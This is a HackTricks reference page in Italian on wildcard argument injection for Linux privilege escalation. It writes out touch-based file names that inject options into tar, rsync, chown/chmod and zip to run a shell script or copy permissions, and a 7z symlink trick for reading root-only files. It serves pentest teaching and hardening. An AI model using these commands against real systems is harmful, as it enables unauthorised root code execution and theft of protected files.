hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
2024-02-10 13:03:23 +00:00

4.7 KiB

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

chown, chmod

Puoi indicare quale proprietario di file e permessi vuoi copiare per il resto dei file

touch "--reference=/my/own/path/filename"

Puoi sfruttare questo utilizzando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco combinato)
Ulteriori informazioni su https://www.exploit-db.com/papers/33930

Tar

Esegui comandi arbitrari:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Puoi sfruttare questo utilizzando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco tar)
Ulteriori informazioni su https://www.exploit-db.com/papers/33930

Rsync

Esegui comandi arbitrari:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Puoi sfruttare questo utilizzando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco rsync)
Ulteriori informazioni su https://www.exploit-db.com/papers/33930

7z

In 7z anche utilizzando -- prima di * (nota che -- significa che l'input successivo non può essere trattato come parametri, quindi solo percorsi dei file in questo caso) puoi causare un errore arbitrario per leggere un file, quindi se un comando come il seguente viene eseguito da root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

E puoi creare file nella cartella in cui viene eseguito questo, potresti creare il file @root.txt e il file root.txt che è un symlink al file che desideri leggere:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Quindi, quando 7z viene eseguito, tratterà root.txt come un file contenente l'elenco dei file che dovrebbe comprimere (è ciò che indica l'esistenza di @root.txt) e quando 7z legge root.txt, leggerà /file/you/want/to/read e poiché il contenuto di questo file non è un elenco di file, genererà un errore mostrando il contenuto.

Maggiori informazioni nei resoconti del box CTF di HackTheBox.

Zip

Eseguire comandi arbitrari:

zip name.zip files -T --unzip-command "sh -c whoami"
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks: